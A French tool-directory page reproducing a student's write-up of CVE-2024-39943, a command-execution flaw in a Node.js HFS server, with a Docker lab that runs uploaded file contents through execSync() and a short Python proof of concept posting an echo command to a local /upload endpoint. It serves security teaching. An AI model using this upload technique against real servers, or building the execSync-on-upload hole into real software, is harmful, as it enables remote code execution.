Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Node.js-CVE-2024-39943 | Kitploit
Outils/GitHubGitHub/jenmrr/node.js-cve-2024-39943
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité d'exécution de commandes Node.js HFS (CVE-2024-39943)

WhiteHat School 3e promotion – Jeongmin Roh (@JenmrR)


Résumé

Dans un environnement de serveur HFS basé sur Node.js, il existe une vulnérabilité qui exécute le contenu des fichiers téléversés via child_process.execSync().
Un attaquant peut exécuter directement des commandes OS via la fonctionnalité de téléversement de fichiers, consulter les résultats des commandes internes du serveur ou contrôler le système.
Cette vulnérabilité correspond à CVE-2024-39943 et présente une menace de même niveau que l'injection de commandes (Remote Code Execution).


Configuration et exécution de l'environnement

  1. Exécution du serveur via l'environnement Docker
  2. Le serveur reçoit les téléversements de fichiers sur le chemin /upload et exécute le contenu du fichier téléversé directement comme commande
  3. L'attaquant peut réaliser une RCE via le téléversement

Flux d'exécution

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Résultat

Réponse du serveur après exécution du PoC :

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Conclusion

  • Cette vulnérabilité est une faille RCE (Remote Command Execution) typique, qui survient lorsque des entrées externes sont exécutées comme commandes OS.
  • Exécuter directement le contenu des fichiers téléversés avec execSync() présente un risque de sécurité critique.
  • Les entrées utilisateur doivent toujours être validées et ne doivent jamais être exécutées directement au sein du serveur.

Télécharger l’outil